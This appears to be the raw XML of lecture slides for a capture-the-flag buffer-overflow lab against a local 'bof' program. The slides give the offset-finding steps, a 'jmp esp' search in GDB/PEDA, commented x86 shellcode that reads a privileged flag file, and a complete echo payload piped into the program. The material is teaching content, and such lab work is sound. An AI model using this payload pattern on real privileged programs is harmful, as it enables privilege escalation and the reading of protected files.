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</p:sldMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId7"/>
    <p:sldId id="257" r:id="rId8"/>
    <p:sldId id="258" r:id="rId9"/>
    <p:sldId id="259" r:id="rId10"/>
    <p:sldId id="261" r:id="rId11"/>
    <p:sldId id="263" r:id="rId12"/>
    <p:sldId id="262" r:id="rId13"/>
    <p:sldId id="264" r:id="rId14"/>
    <p:sldId id="265" r:id="rId15"/>
    <p:sldId id="266" r:id="rId16"/>
    <p:sldId id="267" r:id="rId1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66985" val="928" rev64="64" revOS="3"/>
      <pr:smFileRevision xmlns:pr="smNativeData" dt="1526766985" val="0"/>
      <pr:guideOptions xmlns:pr="smNativeData" dt="152676698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26CD95-DBD8-733B-969E-2D6E83D0607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EFB136-78B4-BA47-FA57-8E12FF190CD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23E7E1-AFA8-7611-E69B-5944A9D5100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F81ED9-979D-ADE8-D340-61BD500E253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t7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8B18AA-E4B1-DEEE-FF33-12BB567D094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t7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t7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D807E-30CD-2876-83C5-C623CE8B7593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D706793-DDA0-2591-EEC8-2BC42986187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DC841AD-E390-9DB7-DE70-15E20F3E2840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AC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Ag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509F6CB-85A8-5C00-E6B1-7355B8FF102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H9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G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1A42545-0BDC-F1D3-921C-FD866B5264A8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kdEh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0dF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49F9622-6CF9-CA60-B727-9A35D86941C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NBMz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ZDQx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2AC718A-C49F-F987-D114-32D23F5A2767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FMU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VFRU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4O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78EFA63-2DFA-DB0C-B436-DB59B478428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9PT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iK1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2852E04-4ADF-D0D8-913D-BC8D607367E9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9B6q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1Ck6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FDZb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0C7856E-20DD-9273-937F-D626CB31658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/qc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rM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EB445C7-89D3-E1B3-9D0C-7FE60B426B2A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H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4U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0E4BE38-76DD-B148-935C-801DF01265D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ZH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7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ED19271-3FD3-8464-9D69-C931DC276B9C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8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A9C78A6-E8B7-C98E-F924-1EDB366A0F4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y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0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68BB486-C8FB-DE42-B533-3E17FA7D436B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lk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CN7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oYu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bep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2871792-DCFF-D2E1-B13F-2AB45971477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Y62t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vrU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EA92C8E-C0C3-FCDA-8D11-368F625F7B63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C5EF34-7AC9-9019-877D-8C4CA13371D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0695DF-91FB-5363-B5BE-6736DBF04332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FF8B105-4BA2-AD47-EC40-BD12FF0E1AE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076F58B-C5DD-2303-93CE-3356BB806566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HO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BFDB6D9-97C6-A840-8845-6115F80B7E3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A70298D-C3F7-25DF-B9C8-358A67864F60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E19619F-D1F3-4C97-BDA1-27C22FEF4B7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c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BB0577C-32C6-E5A1-8808-C4F419467E9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BD7410-5E8E-E882-C005-A8D73A4B36F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1013CC-82D1-45E5-9FA8-74B05DE6692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77F5E1-AF8D-2203-C3CF-5956BB81350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0D1C80-CEE6-58EA-A8B5-38BF52FB5E6D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4D152D-63B1-18E3-FFF5-95B65BBB09C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77E0CF-81AA-2216-E4CF-7743AE81122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8331BD-F3F9-D6C7-B73B-05927F75415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4B00F88-C689-E5F9-C708-30AC4146316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BB8045-0BFA-EE76-B403-FD23CE4D42A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A5B45F-11D6-F042-981D-E717FA536EB2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3E7E7A-34F5-6B88-BB86-C2DD30C84D9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303DDD-9383-65CB-CD88-659E73C63B3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3C9336-78FA-6965-B484-8E30DDCA42D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621B9F-D191-37ED-DFDA-27B85594297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BECD21C-5296-B924-D854-A4719C1A2EF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53E0B445-0BBE-B542-F058-FD17FA1606A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2F24D6D-239F-A7BB-D14A-D5EE030427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EA42FEE-A0C3-F1D9-8D1C-568C61527B0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Exploiting A Buffer Overflow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Run It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000"/>
              <a:t>echo -en "</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AAAAAAAAAAAAAAAA</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="00A65D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BBBB</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="A3238E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="A3238E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x76\</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="A3238E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x84\</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="A3238E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x04\</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="A3238E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x08</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F58220"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F58220"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xB8\</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F58220"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x05\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xBB\</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F58220"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x3E\</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F58220"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xA0\</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F58220"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x04\</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F58220"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x08\</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F58220"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xB9\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xBA\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xCD\</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F58220"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x80\</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F58220"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x89\</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F58220"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xC3\</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F58220"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xB8\</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F58220"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x03\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xB9\</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F58220"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x3E\</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F58220"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xA0\</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F58220"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x04\</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F58220"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x08\</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F58220"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xBA\</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F58220"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x1E\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xCD\</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F58220"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x80\</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F58220"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xB8\</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F58220"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x04\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xBB\</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F58220"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x01\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xB9\</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F58220"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x3E\</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F58220"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xA0\</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F58220"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x04\</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F58220"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x08\</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F58220"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xBA\</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F58220"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x1E\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xCD\</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F58220"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x80\</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F58220"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xB8\</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F58220"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x01\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xBB\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x00\</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F58220"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xCD\</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F58220"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x80</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>" | </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>bof</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:srgbClr val="21409A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Buffer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:srgbClr val="00A65D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EBP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:srgbClr val="A3238E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Return Address (</a:t>
            </a:r>
            <a:r>
              <a:t>jmp </a:t>
            </a:r>
            <a:r>
              <a:t>esp)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:srgbClr val="F58220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Shellcode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Win!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QAAAsRAAA2NAAAQBw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70505"/>
            <a:ext cx="7830185" cy="1821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Vulnerable Program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/</a:t>
            </a:r>
            <a:r>
              <a:t>usr/local/bin/</a:t>
            </a:r>
            <a:r>
              <a:t>bof</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Has privileges to read the flag file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Exploit to win :)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IcYAADyNAAAjC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87165"/>
            <a:ext cx="8149590" cy="14662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Steps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Identify the overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>How much padding to get to </a:t>
            </a:r>
            <a:r>
              <a:t>EIP?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Identify a “</a:t>
            </a:r>
            <a:r>
              <a:t>jmp </a:t>
            </a:r>
            <a:r>
              <a:t>esp” (or equivalent)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>This will overwrite the return address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Write </a:t>
            </a:r>
            <a:r>
              <a:t>shellcode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fd = open(“/</a:t>
            </a:r>
            <a:r>
              <a:t>usr/local/share/</a:t>
            </a:r>
            <a:r>
              <a:t>flag.txt”, O_</a:t>
            </a:r>
            <a:r>
              <a:t>RDONLY);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read(</a:t>
            </a:r>
            <a:r>
              <a:t>fd, </a:t>
            </a:r>
            <a:r>
              <a:t>mem, 30);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800"/>
              <a:t>write(0, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800"/>
              <a:t>mem, 30);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Run it against the vulnerable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Identify the Overflow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How many characters to overwrite </a:t>
            </a:r>
            <a:r>
              <a:t>EIP?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/</a:t>
            </a:r>
            <a:r>
              <a:t>usr/local/bin/</a:t>
            </a:r>
            <a:r>
              <a:t>bof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 lvl="1">
              <a:defRPr sz="2400" i="1"/>
            </a:pPr>
            <a:r>
              <a:t>(enter some data)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restart</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr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Try to put </a:t>
            </a:r>
            <a:r>
              <a:t>BBBB over</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>the return address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SAAAJQUAABwNQAA3y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40655" y="3345180"/>
            <a:ext cx="3446145" cy="23234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fXD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Identify a “</a:t>
            </a:r>
            <a:r>
              <a:t>jmp </a:t>
            </a:r>
            <a:r>
              <a:t>esp”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fP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rPr sz="3000"/>
              <a:t>PEDA: Python Exploit Development Additions</a:t>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="3600"/>
            </a:pPr>
            <a:r>
              <a:t>Plugin for </a:t>
            </a:r>
            <a:r>
              <a:t>GDB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="3600"/>
            </a:pPr>
            <a:r>
              <a:t>Pre-installed on your </a:t>
            </a:r>
            <a:r>
              <a:t>VM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3600"/>
            </a:pPr>
            <a:r>
              <a:t>Commands:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="2800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gdb /</a:t>
            </a:r>
            <a:r>
              <a:t>usr/local/bin/</a:t>
            </a:r>
            <a:r>
              <a:t>bof</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="2800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break main</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="2800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t>run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="3600">
                <a:latin typeface="Liberation Mono" pitchFamily="1" charset="0"/>
                <a:ea typeface="Basic Sans" pitchFamily="1" charset="0"/>
                <a:cs typeface="Basic Sans" pitchFamily="1" charset="0"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>asmsearch “</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>jmp </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>esp”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yMAABUcAABwNQAAoy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04205" y="4565015"/>
            <a:ext cx="2982595" cy="1390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g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Write </a:t>
            </a:r>
            <a:r>
              <a:t>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7T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In order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open()</a:t>
            </a:r>
            <a:r>
              <a:t> the file, we need a pointer to the filename in memory.  Ideas?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Write </a:t>
            </a:r>
            <a:r>
              <a:t>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In order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open()</a:t>
            </a:r>
            <a:r>
              <a:t> the file, we need a pointer to the filename in memory.  Ideas?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>The message!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>0x0804a020 + 30 (</a:t>
            </a:r>
            <a:r>
              <a:t>0x1e) = </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x0804a03e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w0AAJoZAABIKQAAgS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5" y="4161790"/>
            <a:ext cx="4486275" cy="1609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Write </a:t>
            </a:r>
            <a:r>
              <a:t>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Open a handle to the file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eax, 5					</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SYS_open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ebx, </a:t>
            </a:r>
            <a:r>
              <a:t>0x0804a03e		</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pointer to “/</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usr/local/...”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ecx, 0					</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>O_</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RDONLY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600"/>
              <a:t>int	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600"/>
              <a:t>0x80					</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Perform </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Read the file into memory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ebx, </a:t>
            </a:r>
            <a:r>
              <a:t>eax				</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Put the file descriptor in </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ebx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eax, 3					</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SYS_read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ecx, </a:t>
            </a:r>
            <a:r>
              <a:t>0x0804a03e		</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Just reuse this memory :)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edx, 30					</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Length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600"/>
              <a:t>int	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600"/>
              <a:t>0x80					</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Perform </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Write that memory to </a:t>
            </a:r>
            <a:r>
              <a:t>STDOUT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eax, 4					</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SYS_write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ebx, 1					</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>STDOUT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ecx, </a:t>
            </a:r>
            <a:r>
              <a:t>0x0804a03e		</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Buffer containing the flag data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="16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mov	</a:t>
            </a:r>
            <a:r>
              <a:t>edx, 30					</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Length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600"/>
              <a:t>inx	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600"/>
              <a:t>0x80					</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Perform </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>syscall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Z0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sNw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Write </a:t>
            </a:r>
            <a:r>
              <a:t>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Z0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Easy to assemble with online tool!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Z0AWxMAAAAlAAAAEQAAAC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BV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zwMAAJEOAABxNAAAI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367915"/>
            <a:ext cx="7905750" cy="366712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Sans"/>
        <a:cs typeface="Basic Sans"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Basic Sans"/>
        <a:ea typeface="Basic Sans"/>
        <a:cs typeface="Basi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2018-05-19T21:26:48Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-05-19T21:56:25Z</dcterms:modified>
</cp:coreProperties>
</file>